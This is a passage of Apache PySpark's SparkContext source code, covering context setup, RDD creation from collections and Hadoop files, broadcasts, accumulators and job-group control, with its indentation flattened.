# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from __future__ import print_function
import os
import shutil
import signal
import sys
import threading
import warnings
from threading import RLock
from tempfile import NamedTemporaryFile
from py4j.protocol import Py4JError
from pyspark import accumulators
from pyspark.accumulators import Accumulator
from pyspark.broadcast import Broadcast, BroadcastPickleRegistry
from pyspark.conf import SparkConf
from pyspark.files import SparkFiles
from pyspark.java_gateway import launch_gateway, local_connect_and_auth
from pyspark.serializers import PickleSerializer, BatchedSerializer, UTF8Deserializer, \
PairDeserializer, AutoBatchedSerializer, NoOpSerializer, ChunkedStream
from pyspark.storagelevel import StorageLevel
from pyspark.rdd import RDD, _load_from_socket, ignore_unicode_prefix
from pyspark.traceback_utils import CallSite, first_spark_call
from pyspark.status import StatusTracker
from pyspark.profiler import ProfilerCollector, BasicProfiler
if sys.version > '3':
xrange = range
__all__ = ['SparkContext']
# These are special default configs for PySpark, they will overwrite
# the default ones for Spark if they are not configured by user.
DEFAULT_CONFIGS = {
"spark.serializer.objectStreamReset": 100,
"spark.rdd.compress": True,
}
class SparkContext(object):
"""
Main entry point for Spark functionality. A SparkContext represents the
connection to a Spark cluster, and can be used to create L{RDD} and
broadcast variables on that cluster.
.. note:: :class:`SparkContext` instance is not supported to share across multiple
processes out of the box, and PySpark does not guarantee multi-processing execution.
Use threads instead for concurrent processing purpose.
"""
_gateway = None
_jvm = None
_next_accum_id = 0
_active_spark_context = None
_lock = RLock()
_python_includes = None # zip and egg files that need to be added to PYTHONPATH
PACKAGE_EXTENSIONS = ('.zip', '.egg', '.jar')
def __init__(self, master=None, appName=None, sparkHome=None, pyFiles=None,
environment=None, batchSize=0, serializer=PickleSerializer(), conf=None,
gateway=None, jsc=None, profiler_cls=BasicProfiler):
"""
Create a new SparkContext. At least the master and app name should be set,
either through the named parameters here or through C{conf}.
:param master: Cluster URL to connect to
(e.g. mesos://host:port, spark://host:port, local[4]).
:param appName: A name for your job, to display on the cluster web UI.
:param sparkHome: Location where Spark is installed on cluster nodes.
:param pyFiles: Collection of .zip or .py files to send to the cluster
and add to PYTHONPATH. These can be paths on the local file
system or HDFS, HTTP, HTTPS, or FTP URLs.
:param environment: A dictionary of environment variables to set on
worker nodes.
:param batchSize: The number of Python objects represented as a single
Java object. Set 1 to disable batching, 0 to automatically choose
the batch size based on object sizes, or -1 to use an unlimited
batch size
:param serializer: The serializer for RDDs.
:param conf: A L{SparkConf} object setting Spark properties.
:param gateway: Use an existing gateway and JVM, otherwise a new JVM
will be instantiated.
:param jsc: The JavaSparkContext instance (optional).
:param profiler_cls: A class of custom Profiler used to do profiling
(default is pyspark.profiler.BasicProfiler).
>>> from pyspark.context import SparkContext
>>> sc = SparkContext('local', 'test')
>>> sc2 = SparkContext('local', 'test2') # doctest: +IGNORE_EXCEPTION_DETAIL
Traceback (most recent call last):
...
ValueError:...
"""
self._callsite = first_spark_call() or CallSite(None, None, None)
if gateway is not None and gateway.gateway_parameters.auth_token is None:
allow_insecure_env = os.environ.get("PYSPARK_ALLOW_INSECURE_GATEWAY", "0")
if allow_insecure_env == "1" or allow_insecure_env.lower() == "true":
warnings.warn(
"You are passing in an insecure Py4j gateway. This "
"presents a security risk, and will be completely forbidden in Spark 3.0")
else:
raise ValueError(
"You are trying to pass an insecure Py4j gateway to Spark. This"
" presents a security risk. If you are sure you understand and accept this"
" risk, you can set the environment variable"
" 'PYSPARK_ALLOW_INSECURE_GATEWAY=1', but"
" note this option will be removed in Spark 3.0")
SparkContext._ensure_initialized(self, gateway=gateway, conf=conf)
try:
self._do_init(master, appName, sparkHome, pyFiles, environment, batchSize, serializer,
conf, jsc, profiler_cls)
except:
# If an error occurs, clean up in order to allow future SparkContext creation:
self.stop()
raise
def _do_init(self, master, appName, sparkHome, pyFiles, environment, batchSize, serializer,
conf, jsc, profiler_cls):
self.environment = environment or {}
# java gateway must have been launched at this point.
if conf is not None and conf._jconf is not None:
# conf has been initialized in JVM properly, so use conf directly. This represents the
# scenario that JVM has been launched before SparkConf is created (e.g. SparkContext is
# created and then stopped, and we create a new SparkConf and new SparkContext again)
self._conf = conf
else:
self._conf = SparkConf(_jvm=SparkContext._jvm)
if conf is not None:
for k, v in conf.getAll():
self._conf.set(k, v)
self._batchSize = batchSize # -1 represents an unlimited batch size
self._unbatched_serializer = serializer
if batchSize == 0:
self.serializer = AutoBatchedSerializer(self._unbatched_serializer)
else:
self.serializer = BatchedSerializer(self._unbatched_serializer,
batchSize)
# Set any parameters passed directly to us on the conf
if master:
self._conf.setMaster(master)
if appName:
self._conf.setAppName(appName)
if sparkHome:
self._conf.setSparkHome(sparkHome)
if environment:
for key, value in environment.items():
self._conf.setExecutorEnv(key, value)
for key, value in DEFAULT_CONFIGS.items():
self._conf.setIfMissing(key, value)
# Check that we have at least the required parameters
if not self._conf.contains("spark.master"):
raise Exception("A master URL must be set in your configuration")
if not self._conf.contains("spark.app.name"):
raise Exception("An application name must be set in your configuration")
# Read back our properties from the conf in case we loaded some of them from
# the classpath or an external config file
self.master = self._conf.get("spark.master")
self.appName = self._conf.get("spark.app.name")
self.sparkHome = self._conf.get("spark.home", None)
for (k, v) in self._conf.getAll():
if k.startswith("spark.executorEnv."):
varName = k[len("spark.executorEnv."):]
self.environment[varName] = v
self.environment["PYTHONHASHSEED"] = os.environ.get("PYTHONHASHSEED", "0")
# Create the Java SparkContext through Py4J
self._jsc = jsc or self._initialize_context(self._conf._jconf)
# Reset the SparkConf to the one actually used by the SparkContext in JVM.
self._conf = SparkConf(_jconf=self._jsc.sc().conf())
# Create a single Accumulator in Java that we'll send all our updates through;
# they will be passed back to us through a TCP server
auth_token = self._gateway.gateway_parameters.auth_token
self._accumulatorServer = accumulators._start_update_server(auth_token)
(host, port) = self._accumulatorServer.server_address
self._javaAccumulator = self._jvm.PythonAccumulatorV2(host, port, auth_token)
self._jsc.sc().register(self._javaAccumulator)
# If encryption is enabled, we need to setup a server in the jvm to read broadcast
# data via a socket.
# scala's mangled names w/ $ in them require special treatment.
self._encryption_enabled = self._jvm.PythonUtils.getEncryptionEnabled(self._jsc)
self.pythonExec = os.environ.get("PYSPARK_PYTHON", 'python')
self.pythonVer = "%d.%d" % sys.version_info[:2]
# Broadcast's __reduce__ method stores Broadcast instances here.
# This allows other code to determine which Broadcast instances have
# been pickled, so it can determine which Java broadcast objects to
# send.
self._pickled_broadcast_vars = BroadcastPickleRegistry()
SparkFiles._sc = self
root_dir = SparkFiles.getRootDirectory()
sys.path.insert(1, root_dir)
# Deploy any code dependencies specified in the constructor
self._python_includes = list()
for path in (pyFiles or []):
self.addPyFile(path)
# Deploy code dependencies set by spark-submit; these will already have been added
# with SparkContext.addFile, so we just need to add them to the PYTHONPATH
for path in self._conf.get("spark.submit.pyFiles", "").split(","):
if path != "":
(dirname, filename) = os.path.split(path)
try:
filepath = os.path.join(SparkFiles.getRootDirectory(), filename)
if not os.path.exists(filepath):
# In case of YARN with shell mode, 'spark.submit.pyFiles' files are
# not added via SparkContext.addFile. Here we check if the file exists,
# try to copy and then add it to the path. See SPARK-21945.
shutil.copyfile(path, filepath)
if filename[-4:].lower() in self.PACKAGE_EXTENSIONS:
self._python_includes.append(filename)
sys.path.insert(1, filepath)
except Exception:
warnings.warn(
"Failed to add file [%s] speficied in 'spark.submit.pyFiles' to "
"Python path:\n %s" % (path, "\n ".join(sys.path)),
RuntimeWarning)
# Create a temporary directory inside spark.local.dir:
local_dir = self._jvm.org.apache.spark.util.Utils.getLocalDir(self._jsc.sc().conf())
self._temp_dir = \
self._jvm.org.apache.spark.util.Utils.createTempDir(local_dir, "pyspark") \
.getAbsolutePath()
# profiling stats collected for each PythonRDD
if self._conf.get("spark.python.profile", "false") == "true":
dump_path = self._conf.get("spark.python.profile.dump", None)
self.profiler_collector = ProfilerCollector(profiler_cls, dump_path)
else:
self.profiler_collector = None
# create a signal handler which would be invoked on receiving SIGINT
def signal_handler(signal, frame):
self.cancelAllJobs()
raise KeyboardInterrupt()
# see http://stackoverflow.com/questions/23206787/
if isinstance(threading.current_thread(), threading._MainThread):
signal.signal(signal.SIGINT, signal_handler)
def __repr__(self):
return "<SparkContext master={master} appName={appName}>".format(
master=self.master,
appName=self.appName,
)
def _repr_html_(self):
return """
<div>
<p><b>SparkContext</b></p>
<p><a href="{sc.uiWebUrl}">Spark UI</a></p>
<dl>
<dt>Version</dt>
<dd><code>v{sc.version}</code></dd>
<dt>Master</dt>
<dd><code>{sc.master}</code></dd>
<dt>AppName</dt>
<dd><code>{sc.appName}</code></dd>
</dl>
</div>
""".format(
sc=self
)
def _initialize_context(self, jconf):
"""
Initialize SparkContext in function to allow subclass specific initialization
"""
return self._jvm.JavaSparkContext(jconf)
@classmethod
def _ensure_initialized(cls, instance=None, gateway=None, conf=None):
"""
Checks whether a SparkContext is initialized or not.
Throws error if a SparkContext is already running.
"""
with SparkContext._lock:
if not SparkContext._gateway:
SparkContext._gateway = gateway or launch_gateway(conf)
SparkContext._jvm = SparkContext._gateway.jvm
if instance:
if (SparkContext._active_spark_context and
SparkContext._active_spark_context != instance):
currentMaster = SparkContext._active_spark_context.master
currentAppName = SparkContext._active_spark_context.appName
callsite = SparkContext._active_spark_context._callsite
# Raise error if there is already a running Spark context
raise ValueError(
"Cannot run multiple SparkContexts at once; "
"existing SparkContext(app=%s, master=%s)"
" created by %s at %s:%s "
% (currentAppName, currentMaster,
callsite.function, callsite.file, callsite.linenum))
else:
SparkContext._active_spark_context = instance
def __getnewargs__(self):
# This method is called when attempting to pickle SparkContext, which is always an error:
raise Exception(
"It appears that you are attempting to reference SparkContext from a broadcast "
"variable, action, or transformation. SparkContext can only be used on the driver, "
"not in code that it run on workers. For more information, see SPARK-5063."
)
def __enter__(self):
"""
Enable 'with SparkContext(...) as sc: app(sc)' syntax.
"""
return self
def __exit__(self, type, value, trace):
"""
Enable 'with SparkContext(...) as sc: app' syntax.
Specifically stop the context on exit of the with block.
"""
self.stop()
@classmethod
def getOrCreate(cls, conf=None):
"""
Get or instantiate a SparkContext and register it as a singleton object.
:param conf: SparkConf (optional)
"""
with SparkContext._lock:
if SparkContext._active_spark_context is None:
SparkContext(conf=conf or SparkConf())
return SparkContext._active_spark_context
def setLogLevel(self, logLevel):
"""
Control our logLevel. This overrides any user-defined log settings.
Valid log levels include: ALL, DEBUG, ERROR, FATAL, INFO, OFF, TRACE, WARN
"""
self._jsc.setLogLevel(logLevel)
@classmethod
def setSystemProperty(cls, key, value):
"""
Set a Java system property, such as spark.executor.memory. This must
must be invoked before instantiating SparkContext.
"""
SparkContext._ensure_initialized()
SparkContext._jvm.java.lang.System.setProperty(key, value)
@property
def version(self):
"""
The version of Spark on which this application is running.
"""
return self._jsc.version()
@property
@ignore_unicode_prefix
def applicationId(self):
"""
A unique identifier for the Spark application.
Its format depends on the scheduler implementation.
* in case of local spark app something like 'local-1433865536131'
* in case of YARN something like 'application_1433865536131_34483'
>>> sc.applicationId # doctest: +ELLIPSIS
u'local-...'
"""
return self._jsc.sc().applicationId()
@property
def uiWebUrl(self):
"""Return the URL of the SparkUI instance started by this SparkContext"""
return self._jsc.sc().uiWebUrl().get()
@property
def startTime(self):
"""Return the epoch time when the Spark Context was started."""
return self._jsc.startTime()
@property
def defaultParallelism(self):
"""
Default level of parallelism to use when not given by user (e.g. for
reduce tasks)
"""
return self._jsc.sc().defaultParallelism()
@property
def defaultMinPartitions(self):
"""
Default min number of partitions for Hadoop RDDs when not given by user
"""
return self._jsc.sc().defaultMinPartitions()
def stop(self):
"""
Shut down the SparkContext.
"""
if getattr(self, "_jsc", None):
try:
self._jsc.stop()
except Py4JError:
# Case: SPARK-18523
warnings.warn(
'Unable to cleanly shutdown Spark JVM process.'
' It is possible that the process has crashed,'
' been killed or may also be in a zombie state.',
RuntimeWarning
)
pass
finally:
self._jsc = None
if getattr(self, "_accumulatorServer", None):
self._accumulatorServer.shutdown()
self._accumulatorServer = None
with SparkContext._lock:
SparkContext._active_spark_context = None
def emptyRDD(self):
"""
Create an RDD that has no partitions or elements.
"""
return RDD(self._jsc.emptyRDD(), self, NoOpSerializer())
def range(self, start, end=None, step=1, numSlices=None):
"""
Create a new RDD of int containing elements from `start` to `end`
(exclusive), increased by `step` every element. Can be called the same
way as python's built-in range() function. If called with a single argument,
the argument is interpreted as `end`, and `start` is set to 0.
:param start: the start value
:param end: the end value (exclusive)
:param step: the incremental step (default: 1)
:param numSlices: the number of partitions of the new RDD
:return: An RDD of int
>>> sc.range(5).collect()
[0, 1, 2, 3, 4]
>>> sc.range(2, 4).collect()
[2, 3]
>>> sc.range(1, 7, 2).collect()
[1, 3, 5]
"""
if end is None:
end = start
start = 0
return self.parallelize(xrange(start, end, step), numSlices)
def parallelize(self, c, numSlices=None):
"""
Distribute a local Python collection to form an RDD. Using xrange
is recommended if the input represents a range for performance.
>>> sc.parallelize([0, 2, 3, 4, 6], 5).glom().collect()
[[0], [2], [3], [4], [6]]
>>> sc.parallelize(xrange(0, 6, 2), 5).glom().collect()
[[], [0], [], [2], [4]]
"""
numSlices = int(numSlices) if numSlices is not None else self.defaultParallelism
if isinstance(c, xrange):
size = len(c)
if size == 0:
return self.parallelize([], numSlices)
step = c[1] - c[0] if size > 1 else 1
start0 = c[0]
def getStart(split):
return start0 + int((split * size / numSlices)) * step
def f(split, iterator):
return xrange(getStart(split), getStart(split + 1), step)
return self.parallelize([], numSlices).mapPartitionsWithIndex(f)
# Make sure we distribute data evenly if it's smaller than self.batchSize
if "__len__" not in dir(c):
c = list(c) # Make it a list so we can compute its length
batchSize = max(1, min(len(c) // numSlices, self._batchSize or 1024))
serializer = BatchedSerializer(self._unbatched_serializer, batchSize)
def reader_func(temp_filename):
return self._jvm.PythonRDD.readRDDFromFile(self._jsc, temp_filename, numSlices)
def createRDDServer():
return self._jvm.PythonParallelizeServer(self._jsc.sc(), numSlices)
jrdd = self._serialize_to_jvm(c, serializer, reader_func, createRDDServer)
return RDD(jrdd, self, serializer)
def _serialize_to_jvm(self, data, serializer, reader_func, createRDDServer):
"""
Using py4j to send a large dataset to the jvm is really slow, so we use either a file
or a socket if we have encryption enabled.
:param data:
:param serializer:
:param reader_func: A function which takes a filename and reads in the data in the jvm and
returns a JavaRDD. Only used when encryption is disabled.
:param createRDDServer: A function which creates a PythonRDDServer in the jvm to
accept the serialized data, for use when encryption is enabled.
:return:
"""
if self._encryption_enabled:
# with encryption, we open a server in java and send the data directly
server = createRDDServer()
(sock_file, _) = local_connect_and_auth(server.port(), server.secret())
chunked_out = ChunkedStream(sock_file, 8192)
serializer.dump_stream(data, chunked_out)
chunked_out.close()
# this call will block until the server has read all the data and processed it (or
# throws an exception)
r = server.getResult()
return r
else:
# without encryption, we serialize to a file, and we read the file in java and
# parallelize from there.
tempFile = NamedTemporaryFile(delete=False, dir=self._temp_dir)
try:
try:
serializer.dump_stream(data, tempFile)
finally:
tempFile.close()
return reader_func(tempFile.name)
finally:
# we eagerily reads the file so we can delete right after.
os.unlink(tempFile.name)
def pickleFile(self, name, minPartitions=None):
"""
Load an RDD previously saved using L{RDD.saveAsPickleFile} method.
>>> tmpFile = NamedTemporaryFile(delete=True)
>>> tmpFile.close()
>>> sc.parallelize(range(10)).saveAsPickleFile(tmpFile.name, 5)
>>> sorted(sc.pickleFile(tmpFile.name, 3).collect())
[0, 1, 2, 3, 4, 5, 6, 7, 8, 9]
"""
minPartitions = minPartitions or self.defaultMinPartitions
return RDD(self._jsc.objectFile(name, minPartitions), self)
@ignore_unicode_prefix
def textFile(self, name, minPartitions=None, use_unicode=True):
"""
Read a text file from HDFS, a local file system (available on all
nodes), or any Hadoop-supported file system URI, and return it as an
RDD of Strings.
If use_unicode is False, the strings will be kept as `str` (encoding
as `utf-8`), which is faster and smaller than unicode. (Added in
Spark 1.2)
>>> path = os.path.join(tempdir, "sample-text.txt")
>>> with open(path, "w") as testFile:
... _ = testFile.write("Hello world!")
>>> textFile = sc.textFile(path)
>>> textFile.collect()
[u'Hello world!']
"""
minPartitions = minPartitions or min(self.defaultParallelism, 2)
return RDD(self._jsc.textFile(name, minPartitions), self,
UTF8Deserializer(use_unicode))
@ignore_unicode_prefix
def wholeTextFiles(self, path, minPartitions=None, use_unicode=True):
"""
Read a directory of text files from HDFS, a local file system
(available on all nodes), or any Hadoop-supported file system
URI. Each file is read as a single record and returned in a
key-value pair, where the key is the path of each file, the
value is the content of each file.
If use_unicode is False, the strings will be kept as `str` (encoding
as `utf-8`), which is faster and smaller than unicode. (Added in
Spark 1.2)
For example, if you have the following files::
hdfs://a-hdfs-path/part-00000
hdfs://a-hdfs-path/part-00001
...
hdfs://a-hdfs-path/part-nnnnn
Do C{rdd = sparkContext.wholeTextFiles("hdfs://a-hdfs-path")},
then C{rdd} contains::
(a-hdfs-path/part-00000, its content)
(a-hdfs-path/part-00001, its content)
...
(a-hdfs-path/part-nnnnn, its content)
.. note:: Small files are preferred, as each file will be loaded
fully in memory.
>>> dirPath = os.path.join(tempdir, "files")
>>> os.mkdir(dirPath)
>>> with open(os.path.join(dirPath, "1.txt"), "w") as file1:
... _ = file1.write("1")
>>> with open(os.path.join(dirPath, "2.txt"), "w") as file2:
... _ = file2.write("2")
>>> textFiles = sc.wholeTextFiles(dirPath)
>>> sorted(textFiles.collect())
[(u'.../1.txt', u'1'), (u'.../2.txt', u'2')]
"""
minPartitions = minPartitions or self.defaultMinPartitions
return RDD(self._jsc.wholeTextFiles(path, minPartitions), self,
PairDeserializer(UTF8Deserializer(use_unicode), UTF8Deserializer(use_unicode)))
def binaryFiles(self, path, minPartitions=None):
"""
.. note:: Experimental
Read a directory of binary files from HDFS, a local file system
(available on all nodes), or any Hadoop-supported file system URI
as a byte array. Each file is read as a single record and returned
in a key-value pair, where the key is the path of each file, the
value is the content of each file.
.. note:: Small files are preferred, large file is also allowable, but
may cause bad performance.
"""
minPartitions = minPartitions or self.defaultMinPartitions
return RDD(self._jsc.binaryFiles(path, minPartitions), self,
PairDeserializer(UTF8Deserializer(), NoOpSerializer()))
def binaryRecords(self, path, recordLength):
"""
.. note:: Experimental
Load data from a flat binary file, assuming each record is a set of numbers
with the specified numerical format (see ByteBuffer), and the number of
bytes per record is constant.
:param path: Directory to the input data files
:param recordLength: The length at which to split the records
"""
return RDD(self._jsc.binaryRecords(path, recordLength), self, NoOpSerializer())
def _dictToJavaMap(self, d):
jm = self._jvm.java.util.HashMap()
if not d:
d = {}
for k, v in d.items():
jm[k] = v
return jm
def sequenceFile(self, path, keyClass=None, valueClass=None, keyConverter=None,
valueConverter=None, minSplits=None, batchSize=0):
"""
Read a Hadoop SequenceFile with arbitrary key and value Writable class from HDFS,
a local file system (available on all nodes), or any Hadoop-supported file system URI.
The mechanism is as follows:
1. A Java RDD is created from the SequenceFile or other InputFormat, and the key
and value Writable classes
2. Serialization is attempted via Pyrolite pickling
3. If this fails, the fallback is to call 'toString' on each key and value
4. C{PickleSerializer} is used to deserialize pickled objects on the Python side
:param path: path to sequncefile
:param keyClass: fully qualified classname of key Writable class
(e.g. "org.apache.hadoop.io.Text")
:param valueClass: fully qualified classname of value Writable class
(e.g. "org.apache.hadoop.io.LongWritable")
:param keyConverter:
:param valueConverter:
:param minSplits: minimum splits in dataset
(default min(2, sc.defaultParallelism))
:param batchSize: The number of Python objects represented as a single
Java object. (default 0, choose batchSize automatically)
"""
minSplits = minSplits or min(self.defaultParallelism, 2)
jrdd = self._jvm.PythonRDD.sequenceFile(self._jsc, path, keyClass, valueClass,
keyConverter, valueConverter, minSplits, batchSize)
return RDD(jrdd, self)
def newAPIHadoopFile(self, path, inputFormatClass, keyClass, valueClass, keyConverter=None,
valueConverter=None, conf=None, batchSize=0):
"""
Read a 'new API' Hadoop InputFormat with arbitrary key and value class from HDFS,
a local file system (available on all nodes), or any Hadoop-supported file system URI.
The mechanism is the same as for sc.sequenceFile.
A Hadoop configuration can be passed in as a Python dict. This will be converted into a
Configuration in Java
:param path: path to Hadoop file
:param inputFormatClass: fully qualified classname of Hadoop InputFormat
(e.g. "org.apache.hadoop.mapreduce.lib.input.TextInputFormat")
:param keyClass: fully qualified classname of key Writable class
(e.g. "org.apache.hadoop.io.Text")
:param valueClass: fully qualified classname of value Writable class
(e.g. "org.apache.hadoop.io.LongWritable")
:param keyConverter: (None by default)
:param valueConverter: (None by default)
:param conf: Hadoop configuration, passed in as a dict
(None by default)
:param batchSize: The number of Python objects represented as a single
Java object. (default 0, choose batchSize automatically)
"""
jconf = self._dictToJavaMap(conf)
jrdd = self._jvm.PythonRDD.newAPIHadoopFile(self._jsc, path, inputFormatClass, keyClass,
valueClass, keyConverter, valueConverter,
jconf, batchSize)
return RDD(jrdd, self)
def newAPIHadoopRDD(self, inputFormatClass, keyClass, valueClass, keyConverter=None,
valueConverter=None, conf=None, batchSize=0):
"""
Read a 'new API' Hadoop InputFormat with arbitrary key and value class, from an arbitrary
Hadoop configuration, which is passed in as a Python dict.
This will be converted into a Configuration in Java.
The mechanism is the same as for sc.sequenceFile.
:param inputFormatClass: fully qualified classname of Hadoop InputFormat
(e.g. "org.apache.hadoop.mapreduce.lib.input.TextInputFormat")
:param keyClass: fully qualified classname of key Writable class
(e.g. "org.apache.hadoop.io.Text")
:param valueClass: fully qualified classname of value Writable class
(e.g. "org.apache.hadoop.io.LongWritable")
:param keyConverter: (None by default)
:param valueConverter: (None by default)
:param conf: Hadoop configuration, passed in as a dict
(None by default)
:param batchSize: The number of Python objects represented as a single
Java object. (default 0, choose batchSize automatically)
"""
jconf = self._dictToJavaMap(conf)
jrdd = self._jvm.PythonRDD.newAPIHadoopRDD(self._jsc, inputFormatClass, keyClass,
valueClass, keyConverter, valueConverter,
jconf, batchSize)
return RDD(jrdd, self)
def hadoopFile(self, path, inputFormatClass, keyClass, valueClass, keyConverter=None,
valueConverter=None, conf=None, batchSize=0):
"""
Read an 'old' Hadoop InputFormat with arbitrary key and value class from HDFS,
a local file system (available on all nodes), or any Hadoop-supported file system URI.
The mechanism is the same as for sc.sequenceFile.
A Hadoop configuration can be passed in as a Python dict. This will be converted into a
Configuration in Java.
:param path: path to Hadoop file
:param inputFormatClass: fully qualified classname of Hadoop InputFormat
(e.g. "org.apache.hadoop.mapred.TextInputFormat")
:param keyClass: fully qualified classname of key Writable class
(e.g. "org.apache.hadoop.io.Text")
:param valueClass: fully qualified classname of value Writable class
(e.g. "org.apache.hadoop.io.LongWritable")
:param keyConverter: (None by default)
:param valueConverter: (None by default)
:param conf: Hadoop configuration, passed in as a dict
(None by default)
:param batchSize: The number of Python objects represented as a single
Java object. (default 0, choose batchSize automatically)
"""
jconf = self._dictToJavaMap(conf)
jrdd = self._jvm.PythonRDD.hadoopFile(self._jsc, path, inputFormatClass, keyClass,
valueClass, keyConverter, valueConverter,
jconf, batchSize)
return RDD(jrdd, self)
def hadoopRDD(self, inputFormatClass, keyClass, valueClass, keyConverter=None,
valueConverter=None, conf=None, batchSize=0):
"""
Read an 'old' Hadoop InputFormat with arbitrary key and value class, from an arbitrary
Hadoop configuration, which is passed in as a Python dict.
This will be converted into a Configuration in Java.
The mechanism is the same as for sc.sequenceFile.
:param inputFormatClass: fully qualified classname of Hadoop InputFormat
(e.g. "org.apache.hadoop.mapred.TextInputFormat")
:param keyClass: fully qualified classname of key Writable class
(e.g. "org.apache.hadoop.io.Text")
:param valueClass: fully qualified classname of value Writable class
(e.g. "org.apache.hadoop.io.LongWritable")
:param keyConverter: (None by default)
:param valueConverter: (None by default)
:param conf: Hadoop configuration, passed in as a dict
(None by default)
:param batchSize: The number of Python objects represented as a single
Java object. (default 0, choose batchSize automatically)
"""
jconf = self._dictToJavaMap(conf)
jrdd = self._jvm.PythonRDD.hadoopRDD(self._jsc, inputFormatClass, keyClass,
valueClass, keyConverter, valueConverter,
jconf, batchSize)
return RDD(jrdd, self)
def _checkpointFile(self, name, input_deserializer):
jrdd = self._jsc.checkpointFile(name)
return RDD(jrdd, self, input_deserializer)
@ignore_unicode_prefix
def union(self, rdds):
"""
Build the union of a list of RDDs.
This supports unions() of RDDs with different serialized formats,
although this forces them to be reserialized using the default
serializer:
>>> path = os.path.join(tempdir, "union-text.txt")
>>> with open(path, "w") as testFile:
... _ = testFile.write("Hello")
>>> textFile = sc.textFile(path)
>>> textFile.collect()
[u'Hello']
>>> parallelized = sc.parallelize(["World!"])
>>> sorted(sc.union([textFile, parallelized]).collect())
[u'Hello', 'World!']
"""
first_jrdd_deserializer = rdds[0]._jrdd_deserializer
if any(x._jrdd_deserializer != first_jrdd_deserializer for x in rdds):
rdds = [x._reserialize() for x in rdds]
first = rdds[0]._jrdd
rest = [x._jrdd for x in rdds[1:]]
return RDD(self._jsc.union(first, rest), self, rdds[0]._jrdd_deserializer)
def broadcast(self, value):
"""
Broadcast a read-only variable to the cluster, returning a
L{Broadcast<pyspark.broadcast.Broadcast>}
object for reading it in distributed functions. The variable will
be sent to each cluster only once.
"""
return Broadcast(self, value, self._pickled_broadcast_vars)
def accumulator(self, value, accum_param=None):
"""
Create an L{Accumulator} with the given initial value, using a given
L{AccumulatorParam} helper object to define how to add values of the
data type if provided. Default AccumulatorParams are used for integers
and floating-point numbers if you do not provide one. For other types,
a custom AccumulatorParam can be used.
"""
if accum_param is None:
if isinstance(value, int):
accum_param = accumulators.INT_ACCUMULATOR_PARAM
elif isinstance(value, float):
accum_param = accumulators.FLOAT_ACCUMULATOR_PARAM
elif isinstance(value, complex):
accum_param = accumulators.COMPLEX_ACCUMULATOR_PARAM
else:
raise TypeError("No default accumulator param for type %s" % type(value))
SparkContext._next_accum_id += 1
return Accumulator(SparkContext._next_accum_id - 1, value, accum_param)
def addFile(self, path, recursive=False):
"""
Add a file to be downloaded with this Spark job on every node.
The C{path} passed can be either a local file, a file in HDFS
(or other Hadoop-supported filesystems), or an HTTP, HTTPS or
FTP URI.
To access the file in Spark jobs, use
L{SparkFiles.get(fileName)<pyspark.files.SparkFiles.get>} with the
filename to find its download location.
A directory can be given if the recursive option is set to True.
Currently directories are only supported for Hadoop-supported filesystems.
.. note:: A path can be added only once. Subsequent additions of the same path are ignored.
>>> from pyspark import SparkFiles
>>> path = os.path.join(tempdir, "test.txt")
>>> with open(path, "w") as testFile:
... _ = testFile.write("100")
>>> sc.addFile(path)
>>> def func(iterator):
... with open(SparkFiles.get("test.txt")) as testFile:
... fileVal = int(testFile.readline())
... return [x * fileVal for x in iterator]
>>> sc.parallelize([1, 2, 3, 4]).mapPartitions(func).collect()
[100, 200, 300, 400]
"""
self._jsc.sc().addFile(path, recursive)
def addPyFile(self, path):
"""
Add a .py or .zip dependency for all tasks to be executed on this
SparkContext in the future. The C{path} passed can be either a local
file, a file in HDFS (or other Hadoop-supported filesystems), or an
HTTP, HTTPS or FTP URI.
.. note:: A path can be added only once. Subsequent additions of the same path are ignored.
"""
self.addFile(path)
(dirname, filename) = os.path.split(path) # dirname may be directory or HDFS/S3 prefix
if filename[-4:].lower() in self.PACKAGE_EXTENSIONS:
self._python_includes.append(filename)
# for tests in local mode
sys.path.insert(1, os.path.join(SparkFiles.getRootDirectory(), filename))
if sys.version > '3':
import importlib
importlib.invalidate_caches()
def setCheckpointDir(self, dirName):
"""
Set the directory under which RDDs are going to be checkpointed. The
directory must be a HDFS path if running on a cluster.
"""
self._jsc.sc().setCheckpointDir(dirName)
def _getJavaStorageLevel(self, storageLevel):
"""
Returns a Java StorageLevel based on a pyspark.StorageLevel.
"""
if not isinstance(storageLevel, StorageLevel):
raise Exception("storageLevel must be of type pyspark.StorageLevel")
newStorageLevel = self._jvm.org.apache.spark.storage.StorageLevel
return newStorageLevel(storageLevel.useDisk,
storageLevel.useMemory,
storageLevel.useOffHeap,
storageLevel.deserialized,
storageLevel.replication)
def setJobGroup(self, groupId, description, interruptOnCancel=False):
"""
Assigns a group ID to all the jobs started by this thread until the group ID is set to a
different value or cleared.
Often, a unit of execution in an application consists of multiple Spark actions or jobs.
Application programmers can use this method to group all those jobs together and give a
group description. Once set, the Spark web UI will associate such jobs with this group.
The application can use L{SparkContext.cancelJobGroup} to cancel all
running jobs in this group.
>>> import threading
>>> from time import sleep
>>> result = "Not Set"
>>> lock = threading.Lock()
>>> def map_func(x):
... sleep(100)
... raise Exception("Task should have been cancelled")
>>> def start_job(x):
... global result
... try:
... sc.setJobGroup("job_to_cancel", "some description")
... result = sc.parallelize(range(x)).map(map_func).collect()
... except Exception as e:
... result = "Cancelled"
... lock.release()
>>> def stop_job():
... sleep(5)
... sc.cancelJobGroup("job_to_cancel")
>>> suppress = lock.acquire()
>>> suppress = threading.Thread(target=start_job, args=(10,)).start()
>>> suppress = threading.Thread(target=stop_job).start()
>>> suppress = lock.acquire()
>>> print(result)
Cancelled
If interruptOnCancel is set to true for the job group, then job cancellation will result
in Thread.interrupt() being called on the job's executor threads. This is useful to help
ensure that the tasks are actually stopped in a timely manner, but is off by default due
to HDFS-1208, where HDFS may respond to Thread.interrupt() by marking nodes as dead.
"""
self._jsc.setJobGroup(groupId, description, interruptOnCancel)
def setLocalProperty(self, key, value):
"""
Set a local property that affects jobs submitted from this thread, such as the
Spark fair scheduler pool.
"""
self._jsc.setLocalProperty(key, value)
def getLocalProperty(self, key):
"""
Get a local property set in this thread, or null if it is missing. See
L{setLocalProperty}
"""
return self._jsc.getLocalProperty(key)
def setJobDescription(self, value):
"""
Set a human readable description of the current job.
"""
self._jsc.setJobDescription(value)
def sparkUser(self):
"""
Get SPARK_USER for user who is running SparkContext.
"""
return self._jsc.sc().sparkUser()
def cancelJobGroup(self, groupId):
"""
Cancel active jobs for the specified group. See L{SparkContext.setJobGroup}
for more information.
"""
self._jsc.sc().cancelJobGroup(groupId)
